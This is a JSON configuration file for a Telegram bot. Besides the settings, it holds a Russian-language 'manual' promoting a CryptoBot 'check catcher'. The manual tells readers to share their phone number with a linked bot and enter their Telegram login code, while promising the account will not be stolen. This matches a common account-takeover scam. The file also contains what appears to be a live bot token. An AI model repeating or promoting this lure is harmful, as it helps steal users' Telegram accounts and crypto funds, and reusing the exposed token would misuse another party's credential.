{
    "TOKEN": "7281801304:AAEgjrq63_N3OABBkXeHsBhixfpgvFo9IbA",
    "ADMINS": [
        5561161094
    ],
    "CHANNELS": {
        "Новости бота": "@toolbot_channel"
    },
    "MANUALS": [
        {
            "name": "Ловец чеков CryptoBot",
            "description": "Способ как сделать автоматический ловец чеков для CryptoBot через бота",
            "content": "Итак, способ ловца чеков.\n\nСтарт > Поделится номером > потом нажимаешь на кнопку подтвердить номер > вводишь код > меню > там в меню будет пробный ловец чеков там подписаться на канал > там команда будет нажимаешь > и как тебе дали 5 дней пишешь эту команду \".ловец+\"\n\n\nАккаунт не украдут.\n\nhttps://t.me/lkgarvis2bot?start=5561161094\nпо любым вопросам ко мне"
        }
    ],
    "AI_LIST": [
        "@dumebot"
    ],
    "CHAT_ID": -1002583313557,
    "PROXY": {
        "SOCKS5": "For telegram; Cost: 20$"
    }
}